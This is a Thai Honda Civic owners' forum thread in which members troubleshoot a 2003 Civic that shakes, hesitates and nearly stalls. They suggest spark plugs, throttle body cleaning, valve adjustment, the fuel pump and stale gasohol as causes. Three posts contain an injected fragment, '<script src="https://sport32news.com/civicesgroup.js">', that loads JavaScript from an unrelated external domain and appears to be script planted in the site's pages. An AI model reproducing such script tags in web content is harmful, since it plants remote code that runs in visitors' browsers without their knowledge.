ตอบ
sjundet

เข้าร่วม: 28 มีนา 2012
ตอบ: 13

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 8
ให้คำขอบคุณ: 0

ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 28 มีนา 2012 11:24 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
สวัดีคับ ท่านสมาชิกทุกท่าน ผมเปงสมาชิกใหม่สดๆๆ รบกวน
ขอถามหน่อยคับ คือว่า รถผมซิวิค ปี 2003 มีปัญหาคือ เมื่อ 2-3 วันมานี่
ตอนสตาร์ทรถเครื่องมันสั่น เหมือนจะดับ ลองเหยียบรถดู คล้ายกับรถไม่ค่อยวิ่งคับ
และก้อบางครั้งก้อออกกระตุกบ้าง  เลยไปรองเปลี่ยนหัวเทียมดู ก้อสามารถเปงปกติ เปลี่ยน 4 หัวคับ
อยากทราบว่าอาจจะเป้นอย่างอื่นด้วยรือเปล่าคับ ถ้าใครเลยมีอาการอย่างนี่ ช่วยรบกวนแนะนำหน่อยด้วยครับ

แนะนำด้วยคับ 
ได้รับคำขอบคุณจาก: domziia  jagkrapongVilaikaew  karnmotocross01 
myalee

เข้าร่วม: 12 ตุลา 2010
ตอบ: 32

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 12
ให้คำขอบคุณ: 17

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 28 มีนา 2012 12:13 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
ไฟหน้าปัดผิดปกติไหม
ได้รับคำขอบคุณจาก: domziia  karnmotocross01 
Ball Featuring

ชื่อเล่น: บอล

เข้าร่วม: 05 ธันวา 2010
ตอบ: 2224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2668
ให้คำขอบคุณ: 3022

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 28 มีนา 2012 12:26 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
ผมว่าอ็อกซิเจน เซ็นเซอร์ใกล้ไปละมั้งคับ
ได้รับคำขอบคุณจาก: karnmotocross01 
zan

เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

พุธ, 28 มีนา 2012 13:02 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
sjundet พิมพ์ว่า:
สวัดีคับ ท่านสมาชิกทุกท่าน ผมเปงสมาชิกใหม่สดๆๆ รบกวน
ขอถามหน่อยคับ คือว่า รถผมซิวิค ปี 2003 มีปัญหาคือ เมื่อ 2-3 วันมานี่
ตอนสตาร์ทรถเครื่องมันสั่น เหมือนจะดับ ลองเหยียบรถดู คล้ายกับรถไม่ค่อยวิ่งคับ
และก้อบางครั้งก้อออกกระตุกบ้าง  เลยไปรองเปลี่ยนหัวเทียมดู ก้อสามารถเปงปกติ เปลี่ยน 4 หัวคับ
อยากทราบว่าอาจจะเป้นอย่างอื่นด้วยรือเปล่าคับ ถ้าใครเลยมีอาการอย่างนี่ ช่วยรบกวนแนะนำหน่อยด้วยครับ

เปลี่ยนหัวเทียนแล้วหายก็ดีแล้วครับ แสดงว่าหัวเทียนบอด สมควรเปลี่ยน
ส่วนอาการอื่นๆ ที่อาจจะเป็นด้วย ก็สุดแล้วแต่ครับ รถเก่าแล้ว มีหลายเรื่อง
ว่ากันเป็นรายการไป (เยอะ)
ได้รับคำขอบคุณจาก: domziia  karnmotocross01 
tumrider

ชื่อเล่น: ตั้ม

เข้าร่วม: 18 กุมภา 2011
ตอบ: 816

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1109
ให้คำขอบคุณ: 1731

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 28 มีนา 2012 18:21 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
เก็บข้อมูล
ได้รับคำขอบคุณจาก: karnmotocross01 
mugen

เข้าร่วม: 11 มกรา 2012
ตอบ: 224

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 924

สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 28 มีนา 2012 22:33 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
ล้างปีกผีเสื้อหรือยังคับ "<script src="https://sport32news.com/civicesgroup.js">  ยังไงรอผู้รู้มาแจ้งคับ
sjundet

น้องใหม่
น้องใหม่

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พฤหัส, 29 มีนา 2012 14:35 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
ขอบคุณสำหรับทุกคำตอบครับ
monny

ชื่อเล่น: มล

เข้าร่วม: 24 มีนา 2012
ตอบ: 20

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 31
ให้คำขอบคุณ: 1

พฤหัส, 29 มีนา 2012 21:29 - Re: รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
และก้อบางครั้งก้อออกกระตุกบ้าง เลยไปรองเปลี่ยนหัวเทียมดู ก้อสามารถเปงปกติ เปลี่ยน 4 หัวคับ

สวัสดีค่ะยินดีที่รู้จักนะค่ะ เป็นน้องใหม่เหมือนกันค่ะ ตามที่ถามมารถของมลก็มีอาการแบบนี้เหมือนกันค่ะ คือวิ่งๆ ไปอยู่ดีๆ พอชะลอเหมือนรอบจะตก เครื่องจะสั่น พอเบา ก็จะดับค่ะ พอเป็นมากๆ เข้าก็เลยเอาไปเข้าอู่ซ่อมรถแถวนวมินทร์ ช่างบอกว่า "วาว ลิ้นปี่ล่าง สกปรก ช่างก็เลยถอดมาทำความสะอาด อาการก็หายเป็นปรกติค่ะ " ซึ่งจริงๆ แล้วก่อนหน้านี้เอารถเข้าศูนย์ก็หาสาเหตุไม่เจอ ตอนนี้รถสุด love ก็พาเที่ยวได้เหมือนเดิมค่ะ
ได้รับคำขอบคุณจาก: domziia  okuma  jagkrapongVilaikaew  neam62  karnmotocross01 
sjundet

น้องใหม่
น้องใหม่

ศุกร์, 30 มีนา 2012 08:39 - Re: รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
monny พิมพ์ว่า:

และก้อบางครั้งก้อออกกระตุกบ้าง เลยไปรองเปลี่ยนหัวเทียมดู ก้อสามารถเปงปกติ เปลี่ยน 4 หัวคับ

สวัสดีค่ะยินดีที่รู้จักนะค่ะ เป็นน้องใหม่เหมือนกันค่ะ ตามที่ถามมารถของมลก็มีอาการแบบนี้เหมือนกันค่ะ คือวิ่งๆ ไปอยู่ดีๆ พอชะลอเหมือนรอบจะตก เครื่องจะสั่น พอเบา ก็จะดับค่ะ พอเป็นมากๆ เข้าก็เลยเอาไปเข้าอู่ซ่อมรถแถวนวมินทร์ ช่างบอกว่า "วาว ลิ้นปี่ล่าง สกปรก ช่างก็เลยถอดมาทำความสะอาด อาการก็หายเป็นปรกติค่ะ " ซึ่งจริงๆ แล้วก่อนหน้านี้เอารถเข้าศูนย์ก็หาสาเหตุไม่เจอ ตอนนี้รถสุด love ก็พาเที่ยวได้เหมือนเดิมค่ะ

ขอบคุณมากที่ช่วยแนะนำ เดี่ยวจะลองไปให้ช่างดูครับ ขอบคุณที่แนะนำครับ ซ่อมแล้วจะมาบอกครับ
Luckyss

เข้าร่วม: 12 กันยา 2013
ตอบ: 2

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
พฤหัส, 12 กันยา 2013 11:11 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
รุ่นเดียวกันเลยค่ะ  เพิ่งเจออาการนี้เมื่อเช้าเลย

สตาร์ท >> ขับออกมาสั่นตลอดทาง>>แวะเติมแก๊ส  สตารท์ใหม่ก็ยังเป็น  จึงเหยียบคันเร่งให้ตัดเข้าระบบแก๊ส >> ขับแก๊สมาได้ปกติ  พอถึงที่ทำงาน ลองสตาร์ทใหม่(ปกติรถจะสตาร์ทด้วยน้ำมันค่ะ  ระหว่างรอตัดเข้าแก๊ส  รถสั่นตลอดเวลาเลยค่ะ) 

((รถใช้แก๊ส NGV เคยเปลี่ยนปั้มติ๊กมาแล้วเมื่อ 2 ปีก่อน(มือสอง) และช่างแนะนำให้เติมเบนซินค้างถัง  แต่ช่วงหลัง หาเติมลำบาก จึงเติม โซฮอล์ 91 แทน)) 

อยากถามว่า  เป็นปั้มติ๊กอีกหรือเปล่าคะ   หรือเป็นที่สาเหตุอื่น
dantouch

ชื่อเล่น: แดน

เข้าร่วม: 24 พฤศจิกา 2009
ตอบ: 1529

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2418
ให้คำขอบคุณ: 614

พฤหัส, 12 กันยา 2013 11:33 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
ตั้งวาล์วโหลด หายชัวร์ เคยเป็น
Luckyss

เข้าร่วม: 12 กันยา 2013
ตอบ: 2

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 3
พฤหัส, 12 กันยา 2013 11:36 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
dantouch พิมพ์ว่า:
ตั้งวาล์วโหลด หายชัวร์ เคยเป็น

ขอบคุณค่ะ

N_J Civic

เข้าร่วม: 27 ตุลา 2009
ตอบ: 3806

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5146
ให้คำขอบคุณ: 5687

พฤหัส, 12 กันยา 2013 11:59 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
Luckyss พิมพ์ว่า:
รุ่นเดียวกันเลยค่ะ  เพิ่งเจออาการนี้เมื่อเช้าเลย

สตาร์ท >> ขับออกมาสั่นตลอดทาง>>แวะเติมแก๊ส  สตารท์ใหม่ก็ยังเป็น  จึงเหยียบคันเร่งให้ตัดเข้าระบบแก๊ส >> ขับแก๊สมาได้ปกติ  พอถึงที่ทำงาน ลองสตาร์ทใหม่(ปกติรถจะสตาร์ทด้วยน้ำมันค่ะ  ระหว่างรอตัดเข้าแก๊ส  รถสั่นตลอดเวลาเลยค่ะ) 

((รถใช้แก๊ส NGV เคยเปลี่ยนปั้มติ๊กมาแล้วเมื่อ 2 ปีก่อน(มือสอง) และช่างแนะนำให้เติมเบนซินค้างถัง  แต่ช่วงหลัง หาเติมลำบาก จึงเติม โซฮอล์ 91 แทน)) 

อยากถามว่า  เป็นปั้มติ๊กอีกหรือเปล่าคะ   หรือเป็นที่สาเหตุอื่น

ระวังเรื่องโซฮอลจะตกตะกอนกลายเป็นน้ำครับถ้าไม่ได้ใช้นาน ๆ ถ้ากลายเป็นน้ำก็นั่นแหล่ะรถจะสะอึก แนะนำเหมือนช่างครับ วิ่งน้ำมันให้หมดแล้วเติม เบนซิน ค่าอ๊อกเทนมันสูงกว่าโซฮอลและจะไม่กลายสภาพครับ

ได้รับคำขอบคุณจาก: okuma  karnmotocross01 
G221i

ชื่อเล่น: บอย

เข้าร่วม: 14 มิถุนา 2012
ตอบ: 86

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 114
ให้คำขอบคุณ: 41

ปี: 2005
พฤหัส, 12 กันยา 2013 12:15 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
ปั๊มติ๊กจะเสียหรือเปล่า ผมเคยเป็นอาการแบบนี้แหละ เป็นอยู่ ได้ 2 3 อาทิตย์มันก็ลาโลกไป
N_J Civic

ครอบครัว ES
ครอบครัว ES

พฤหัส, 12 กันยา 2013 12:51 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
G221i พิมพ์ว่า:
ปั๊มติ๊กจะเสียหรือเปล่า ผมเคยเป็นอาการแบบนี้แหละ เป็นอยู่ ได้ 2 3 อาทิตย์มันก็ลาโลกไป

ปั๊มติ๊กไม่น่าจะเสียเร็วครับ นอกจากว่าปล่อยให้มันดูดลมบ่อย ๆ

domziia

ชื่อเล่น: เจต

เข้าร่วม: 24 กุมภา 2012
ตอบ: 1246

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1167
ให้คำขอบคุณ: 3865

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 12 กันยา 2013 19:23 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
อาการแบบนี้เป็นตอนที่ผมเติมe85 คับ
ได้รับคำขอบคุณจาก: N_J Civic  karnmotocross01 
wittayab

เข้าร่วม: 19 พฤศจิกา 2008
ตอบ: 979

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1633
ให้คำขอบคุณ: 226

ศุกร์, 13 กันยา 2013 01:11 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
1. ปั้มติ๊ก
2. กรองเบนซิน
3. คอยล์
4. มอเตอร์เดินเบา
5. ตั้งวาว์ล
6. หัวเทียน

ปล. เท่าที่นึกออกก็มีประมาณนี้อ่ะครับ
ได้รับคำขอบคุณจาก: okuma  karnmotocross01 
nammon_211

ชื่อเล่น: น้ำมนต์

เข้าร่วม: 12 มิถุนา 2013
ตอบ: 2081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1949
ให้คำขอบคุณ: 1031

สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 13 กันยา 2013 05:05 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
เข้ามาเก็บข้อมูลคับ..
aidgy

ชื่อเล่น: เดย์

เข้าร่วม: 17 กรกฎา 2010
ตอบ: 155

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 94
ให้คำขอบคุณ: 3

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 13 กันยา 2013 07:00 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
zan พิมพ์ว่า:

เปลี่ยนหัวเทียนแล้วหายก็ดีแล้วครับ แสดงว่าหัวเทียนบอด สมควรเปลี่ยน
ส่วนอาการอื่นๆ ที่อาจจะเป็นด้วย ก็สุดแล้วแต่ครับ รถเก่าแล้ว มีหลายเรื่อง

ใช้น้ำมัน อะไรครับ แก๊สโซฮอลป่าวครับ ระวังจะเป็นแบบผมนะครับ แบบว่าเติมเอาไว้สตาทร์ อย่างเดียว แล้วไปใช้ LPG คือดองไว้ในถังนาน น้ำมันบูด กลิ่นไม่เหมือนน้ำมัน กลิ่นไปเหมือนน้ำยาซักแห้งที่ผสมสีอ่ะ และ อาจจะทำให้หัวฉีดท่านเสีย ผมโดนมาคือ หัวฉีดมันค้างปิดน้ำมันไม่อยู่ เข้าห้องเผาไหม้ตลอก เฟ้อ ทำให้วิ่งไม่ออกกว่าจะหาเจอ หมดไปเพียบครับ
ได้รับคำขอบคุณจาก: okuma  N_J Civic  karnmotocross01 
N_J Civic

ครอบครัว ES
ครอบครัว ES

ศุกร์, 13 กันยา 2013 11:10 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
aidgy พิมพ์ว่า:

ใช้น้ำมัน อะไรครับ แก๊สโซฮอลป่าวครับ ระวังจะเป็นแบบผมนะครับ แบบว่าเติมเอาไว้สตาทร์ อย่างเดียว แล้วไปใช้ LPG คือดองไว้ในถังนาน น้ำมันบูด กลิ่นไม่เหมือนน้ำมัน กลิ่นไปเหมือนน้ำยาซักแห้งที่ผสมสีอ่ะ และ อาจจะทำให้หัวฉีดท่านเสีย ผมโดนมาคือ หัวฉีดมันค้างปิดน้ำมันไม่อยู่ เข้าห้องเผาไหม้ตลอก เฟ้อ ทำให้วิ่งไม่ออกกว่าจะหาเจอ หมดไปเพียบครับ

+1 ครับ

Saka

ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ศุกร์, 13 กันยา 2013 11:37 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
Luckyss พิมพ์ว่า:

เคยเป็นเหมือนกัน หัวฉีดตัน ลองเช็คดูโดยอยู่ในโหมดน้ำมัน ดึงปลัั๊กหัวฉีดทีละปลั๊ก สูบไหนดึงแล้วสั่นมากปกติ ถ้าดึงแล้วสั่นเหมือนเดิมหัวนั้นแหละ
neverplus

ชื่อเล่น: วิน

เข้าร่วม: 01 กรกฎา 2013
ตอบ: 1591

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1061
ให้คำขอบคุณ: 185

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 13 กันยา 2013 17:18 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
aidgy พิมพ์ว่า:

งั้นผมต้องไปเติมเบนซินทิ้งไว้แทนแล้วสิ ทุกวันนี้ โซฮอล์ 95 แต่ใช้วิ่งบ้าง เวลาแก๊สเตือนใกล้หมด "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: N_J Civic  karnmotocross01 
bigbom

ชื่อเล่น: บิ๊ก

เข้าร่วม: 17 มกรา 2012
ตอบ: 552

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 885
ให้คำขอบคุณ: 866

ศุกร์, 13 กันยา 2013 23:58 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
ถ้าเป็นอีกก็ลองถอดกรองอากาศดู แล้วเดินเบาปกติครับ เทียบกับตอนที่ใส่กรองอากาศ ถ้าหายสั่นแล้วก็เปลี่ยนกรองหรือเป่าทำความสะอาด ลองดูครับ
houaw3911

เข้าร่วม: 21 ตุลา 2013
ตอบ: 1

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 1
จันทร์, 21 ตุลา 2013 02:32 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
หัวเทียน-สายหัวเทียน-ลิ้นปีกผีเสื้อ-ลิ้นปี่ล่าง-ตั้งวาว์ลโหลด-ถ่ายโซฮอลออกใส่เบนซิน-คอยซ์ต่างๆ-หัวฉีดค้าง-ตั้งออกซิเจนเซนเซอร์-มันมีหลายสาเหตุลองเอาพวกนี้ไปไล่ดูคับปั๊มติ๊กแนะนำหลังสุดเลย
K-yuthya

ชื่อเล่น: เค

เข้าร่วม: 14 สิงหา 2012
ตอบ: 806

Guru ES
Guru ES

ได้รับคำขอบคุณ: 528
ให้คำขอบคุณ: 803

จันทร์, 21 ตุลา 2013 06:38 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
houaw3911 พิมพ์ว่า:
หัวเทียน-สายหัวเทียน-ลิ้นปีกผีเสื้อ-ลิ้นปี่ล่าง-ตั้งวาว์ลโหลด-ถ่ายโซฮอลออกใส่เบนซิน-คอยซ์ต่างๆ-หัวฉีดค้าง-ตั้งออกซิเจนเซนเซอร์-มันมีหลายสาเหตุลองเอาพวกนี้ไปไล่ดูคับปั๊มติ๊กแนะนำหลังสุดเลย

es ไม่มีสายหัวเทียนครับ ใช้ direct coil
Memory11

ชื่อเล่น: หนึ่ง

เข้าร่วม: 06 พฤษภาคม 2013
ตอบ: 1892

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1457
ให้คำขอบคุณ: 2074

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 21 ตุลา 2013 08:33 - รถมีอาการกระตุก เครื่องสั่น เหยียบไม่วิ่ง คล้ายๆกับจะดับ เกิดจากสาเหตุใดคับ
มาเก็บข้อมูลครับ "<script src="https://sport32news.com/civicesgroup.js">
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.